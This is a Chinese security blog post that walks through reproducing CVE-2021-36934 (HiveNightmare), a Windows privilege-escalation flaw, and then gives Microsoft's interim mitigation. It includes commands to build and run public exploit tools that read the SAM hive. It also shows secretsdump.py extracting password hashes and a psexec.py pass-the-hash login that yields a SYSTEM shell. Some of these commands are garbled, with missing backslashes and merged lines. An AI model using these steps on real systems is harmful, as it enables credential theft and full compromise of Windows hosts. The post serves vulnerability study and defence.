CVE-2021-36934 Windows提权漏洞复现

  • A+
所属分类:安全文章

点击蓝字

CVE-2021-36934 Windows提权漏洞复现

关注我们



声明

本文作者:TeamsSix
本文字数:1270

阅读时长:20~30分钟

附件/链接:点击查看原文下载

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。

狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。



前言


7 月 20 日,微软确认了一个新的本地提权漏洞,该漏洞会影响 Windows 自 2018 年 10 月以来发布的版本,即 Windows 10 Version 1809 以后的版本。


不过值得注意的是该漏洞不影响 Windows Server 版本。


对于这个漏洞安全研究成员将其称为 HiveNightmare 或者 SeriousSAM ,该漏洞允许低权限的用户访问 Windows 系统文件,成功利用此漏洞的攻击者可以使用 SYSTEM 特权运行任意代码。


根据微软的介绍,出现本地提权漏洞是由于多个系统文件(包括安全账户管理器数据库SAM)过度许可访问控制列表所导致。


目前 POC 和 EXP 已经被公开,利用公开的 POC 可以低权限账号读取 SAM 等文件。


一、

检查是否易受攻击

执行以下命令:


icacls C:windowssystem32configsam


如果输出 BUILTINUsers:(I)(RX) 表示该系统易受攻击。


CVE-2021-36934 Windows提权漏洞复现


如果输出 Access is denied 或拒绝访问表示该系统不易受攻击。


CVE-2021-36934 Windows提权漏洞复现


二、

漏洞复现

EXP 地址为:https://github.com/GossiTheDog/HiveNightmare


作者编译好的 exe 文件:

https://github.com/GossiTheDog/HiveNightmare/releases/download/0.5/HiveNightmare.exe


直接将作者编译好的 HiveNightmare.exe 拷贝到目标系统上执行,这里以 Windows 10 1809 为例。


CVE-2021-36934 Windows提权漏洞复现


可以看到在低权限账号下,成功利用 CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。


除了 HiveNightmare 项目外,ShadowSteal 项目也能实现同样的效果,不过该项目需要编译使用,编译步骤如下:


在 Linux 下运行以下命令,以 Kali 为例。


sudo apt-get install nimnimble install zippy argparsenimble install winimsudo apt-get install mingw-w64git clone https://github.com/HuskyHacks/ShadowSteal.git && cd ShadowStealmake && cd bin/ && ls -l


将编译好的 ShadowSteal.exe 放到目标系统上直接执行即可。


CVE-2021-36934 Windows提权漏洞复现


在获得 SAM、SECURITY、SYSTEM 文件后,我们就可以使用 secretsdump.py 获取目标用户的 hash 了。


git clone https://github.com/SecureAuthCorp/impacket.gitcd impacket/examplespython3 secretsdump.py -sam SAM-2021-06-17 -system SYSTEM-2021-06-17 -security SECURITY-2021-06-17 LOCAL


CVE-2021-36934 Windows提权漏洞复现


再使用 psexec.py 直接利用 administrator 的 hash 登录管理员账户,获得 SYSTEM 权限会话。


python3 psexec.py -hashes xxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxx [email protected] cmd.exe


CVE-2021-36934 Windows提权漏洞复现


三、

修复方案

微软目前仍在研究该漏洞(编号为CVE-2021-36934),还未发布补丁更新。不过微软提供了一个临时性的解决方案。


1、限制对 %windir%system32config 内容的访问


以管理员身份打开命令提示符或 Windows PowerShell,运行以下命令:icacls %windir%system32config*.* /inheritance:e


2、删除卷影复制服务 (VSS) 卷影副本


删除限制访问 %windir%system32config 之前存在的任何系统还原点和卷影卷,创建一个新的系统还原点(如果需要)。


不过在操作时需要注意的是,从系统中删除卷影副本会影响系统和文件的“恢复“操作。



后记


参考文章:
https://mp.weixin.qq.com/s/zSHwBUe-1ObumPt6v0pxMg
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247494395&idx=1&sn=c40e68e018c2112d7e3ce74b9a55c724


作者



CVE-2021-36934 Windows提权漏洞复现

TeamsSix

我靠着那加给我力量的,凡事都能作。(腓立比书 4:13 和合本)


扫描关注公众号回复加群

和师傅们一起讨论研究~


WgpSec狼组安全团队

微信号:wgpsec

Twitter:@wgpsec


CVE-2021-36934 Windows提权漏洞复现
CVE-2021-36934 Windows提权漏洞复现


本文始发于微信公众号(WgpSec狼组安全团队):CVE-2021-36934 Windows提权漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: